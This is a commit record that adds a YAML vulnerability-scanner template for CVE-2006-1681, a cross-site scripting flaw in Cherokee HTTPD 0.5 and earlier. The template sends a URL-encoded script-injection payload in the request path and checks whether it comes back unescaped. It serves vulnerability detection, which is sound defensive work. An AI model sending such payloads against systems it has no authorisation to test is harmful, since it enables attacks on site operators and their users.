Merge pull request #2339 from geeknik/patch-14

Create CVE-2006-1681.yaml
2021-08-07 14:52:59 +05:30 · 2021-08-07 14:52:59 +05:30 · ce0a873337
parent 8b94298c81 1b28477a9a
commit ce0a873337
1 changed files with 30 additions and 0 deletions
--- a/cves/2006/CVE-2006-1681.yaml
+++ b/cves/2006/CVE-2006-1681.yaml
@ -0,0 +1,30 @@
+id: CVE-2006-1681
+
+info:
+  name: Cherokee HTTPD <=0.5 XSS
+  description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
+  reference:
+    - https://www.securityfocus.com/bid/17408
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-1681
+  author: geeknik
+  severity: medium
+  tags: cherokee,httpd,xss,cve,cve2006
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html